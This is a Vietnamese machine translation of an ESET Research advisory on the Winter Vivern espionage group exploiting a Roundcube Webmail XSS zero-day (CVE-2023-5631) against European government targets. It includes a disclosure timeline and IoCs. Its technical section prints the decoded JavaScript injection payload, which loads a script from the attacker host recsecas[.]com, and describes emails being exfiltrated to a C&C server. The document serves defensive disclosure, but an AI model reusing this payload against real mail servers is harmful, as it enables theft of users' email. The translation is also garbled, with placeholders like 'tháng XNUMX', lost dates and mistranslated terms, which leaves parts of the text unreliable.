Nghiên cứu ESET

ESET Research khuyên bạn nên cập nhật Roundcube Webmail lên phiên bản mới nhất càng sớm càng tốt

Matthieu Faou

Tháng Mười 25 2023  •  , 5 phút đọc

ESET Research đã theo dõi chặt chẽ các hoạt động gián điệp mạng của Winter Vivern trong hơn một năm và trong quá trình giám sát định kỳ, chúng tôi phát hiện ra rằng nhóm này đã bắt đầu khai thác lỗ hổng zero-day. XSS lỗ hổng trên máy chủ Webmail Roundcube vào ngày 11 tháng XNUMX^th, 2023. Đây là một lỗ hổng khác với CVE-2020-35730, cũng được nhóm khai thác theo tìm hiểu của chúng tôi.

Theo dữ liệu đo từ xa của ESET, chiến dịch này nhắm mục tiêu vào các máy chủ Webmail Roundcube thuộc các tổ chức chính phủ và một tổ chức tư vấn, tất cả đều ở Châu Âu.

Dòng thời gian tiết lộ lỗ hổng:

• 2023-10-12: ESET Research đã báo cáo lỗ hổng bảo mật cho nhóm Roundcube.
• 2023-10-14: Nhóm Roundcube đã phản hồi và thừa nhận lỗ hổng.
• 2023-10-14: Nhóm Roundcube đã vá lỗ hổng.
• 2023-10-16: Nhóm Roundcube đã phát hành các bản cập nhật bảo mật để giải quyết lỗ hổng bảo mật (1.6.4, 1.5.5 và 1.4.15).
• 2023-10-18: ESET CNA phát hành CVE cho lỗ hổng (CVE-2023-5631).
• 2023-10-25: Bài đăng trên blog của ESET Research đã được xuất bản.

Chúng tôi muốn cảm ơn các nhà phát triển Roundcube vì đã trả lời nhanh chóng và vá lỗ hổng trong khung thời gian ngắn như vậy.

Hồ sơ Winter Vivern

Winter Vivern là một nhóm gián điệp mạng lần đầu tiên được tiết lộ bởi DomainTools vào năm 2021. Nó được cho là đã hoạt động ít nhất từ ​​năm 2020 và nhắm mục tiêu vào các chính phủ ở Châu Âu và Trung Á. Để xâm phạm các mục tiêu của mình, nhóm này sử dụng các tài liệu độc hại, các trang web lừa đảo và một cửa sau PowerShell tùy chỉnh (xem các bài viết từ Trung tâm bảo vệ mạng nhà nước Ukraine và từ Phòng thí nghiệm Sentinel). Chúng tôi tin tưởng với độ tin cậy thấp rằng Winter Vivern có liên quan đến Người bảo vệ có ria mép, một nhóm tinh vi liên kết với Belarus mà chúng tôi đã công bố lần đầu tiên vào tháng 2023 năm XNUMX.

Winter Vivern đã nhắm mục tiêu vào các máy chủ email Zimbra và Roundcube thuộc các tổ chức chính phủ ít nhất kể từ năm 2022 – xem bài viết này từ Proofpoint. Đặc biệt, chúng tôi quan sát thấy nhóm đã khai thác CVE-2020-35730, một lỗ hổng XSS khác trong Roundcube, vào tháng 2023 và tháng XNUMX năm XNUMX. Lưu ý rằng sednit (còn được gọi là APT28) cũng đang khai thác lỗ hổng XSS cũ này trong Roundcube, đôi khi nhằm vào các mục tiêu tương tự.

Chi tiết kỹ thuật

Khai thác lỗ hổng XSS, được giao CVE-2023-5631, có thể được thực hiện từ xa bằng cách gửi một email được tạo đặc biệt. Trong chiến dịch Winter Vivern này, các email được gửi từ team.managment@outlook[.]com và có chủ đề Bắt đầu trong Outlook của bạn, như được hiển thị trong Hình 1.

Thoạt nhìn, email này có vẻ không độc hại – nhưng nếu chúng ta kiểm tra mã nguồn HTML, được hiển thị trong Hình 2, chúng ta có thể thấy thẻ SVG ở cuối, chứa tải trọng được mã hóa base64.

Khi chúng tôi giải mã giá trị được mã hóa base64 trong href thuộc tính của sử dụng đánh dấu, chúng ta có:

'))” />

như x đối số giá trị của href thuộc tính không phải là một URL hợp lệ, đối tượng này lỗi lầm thuộc tính sẽ được kích hoạt. Giải mã tải trọng trong lỗi lầm thuộc tính cung cấp cho chúng tôi mã JavaScript sau (với URL độc hại được gỡ lỗi theo cách thủ công), mã này sẽ được thực thi trong trình duyệt của nạn nhân trong bối cảnh phiên Roundcube của họ:

var fe=document.createElement('script');fe.src=”https://recsecas[.]com/controlserver/checkupdate.js”;document.body.appendChild(fe);

Đáng ngạc nhiên là chúng tôi nhận thấy rằng tính năng chèn JavaScript hoạt động trên phiên bản Roundcube được vá đầy đủ. Hóa ra đây là lỗ hổng XSS zero-day ảnh hưởng đến tập lệnh phía máy chủ rcube_washtml.php, tài liệu này không vệ sinh đúng cách tài liệu SVG độc hại trước khi được thêm vào trang HTML do người dùng Roundcube giải thích. Chúng tôi đã báo cáo điều đó với Roundcube và đúng là như vậy vá vào tháng XIUMX^th, 2023 (xem cái này cam kết). Lỗ hổng ảnh hưởng đến Roundcube phiên bản 1.6.x trước 1.6.4, 1.5.x trước 1.5.5 và 1.4.x trước 1.4.15.

Tóm lại, bằng cách gửi một email được tạo đặc biệt, kẻ tấn công có thể tải mã JavaScript tùy ý trong cửa sổ trình duyệt của người dùng Roundcube. Không cần tương tác thủ công ngoài việc xem tin nhắn trong trình duyệt web.

Giai đoạn thứ hai là một trình tải JavaScript đơn giản có tên kiểm traupdate.js và được thể hiện trong Hình 3.

Tải trọng JavaScript cuối cùng - được hiển thị trong Hình 4 – có thể liệt kê các thư mục và email trong tài khoản Roundcube hiện tại và lọc các email đến máy chủ C&C bằng cách thực hiện các yêu cầu HTTP tới https://recsecas[.]com/controlserver/saveMessage.

Kết luận

Winter Vivern đã tăng cường hoạt động của mình bằng cách sử dụng lỗ hổng zero-day trong Roundcube. Trước đây, nó đã sử dụng các lỗ hổng đã biết trong Roundcube và Zimbra, những bằng chứng về khái niệm này có sẵn trực tuyến.

Mặc dù bộ công cụ của nhóm có độ phức tạp thấp, nhưng nó vẫn là mối đe dọa đối với các chính phủ ở châu Âu vì tính kiên trì, chạy các chiến dịch lừa đảo rất thường xuyên và vì một số lượng đáng kể các ứng dụng truy cập internet không được cập nhật thường xuyên mặc dù chúng được biết là có chứa lỗ hổng bảo mật. .

Đối với bất kỳ câu hỏi nào về nghiên cứu của chúng tôi được công bố trên WeLiveSecurity, vui lòng liên hệ với chúng tôi theo địa chỉ đe dọaintel@eset.com.
ESET Research cung cấp các báo cáo tình báo APT riêng và nguồn cấp dữ liệu. Mọi thắc mắc về dịch vụ này, hãy truy cập Thông báo về mối đe dọa của ESET .

IoC

Các tập tin

mạng

Địa chỉ email

team.managment@outlook[.]com

Bảng này được tạo bằng cách sử dụng phiên bản 13 của khung MITER ATT & CK.